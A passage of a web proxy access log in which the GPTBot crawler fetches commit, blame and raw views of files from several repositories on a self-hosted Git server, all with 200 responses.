11.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 10308] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 48131] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 10382] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 10413] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13219] [Gzip 6.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 10383] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 24200] [Gzip 11.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 15405] [Gzip 7.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2fdata%2flogs%2ffallback_http_access.log" [Client 74.7.227.38] [Length 17835] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2ffallback_http_access.log" [Client 74.7.227.38] [Length 26930] [Gzip 6.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2ffallback_http_access.log" [Client 74.7.227.38] [Length 26177] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 11436] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 11073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 10150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 21995] [Gzip 6.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js" -[17/Feb/2026:15:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13251] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 11061] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 11523] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 22028] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js" -[17/Feb/2026:15:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 12125] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" -[17/Feb/2026:15:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 25164] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 11073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:15:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11065] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" -[17/Feb/2026:15:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 10414] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 11405] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 2814905] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" -[17/Feb/2026:15:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 9930] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" -[17/Feb/2026:15:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" -[17/Feb/2026:15:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html?display=source" [Client 74.7.227.38] [Length 16461] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" -[17/Feb/2026:15:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 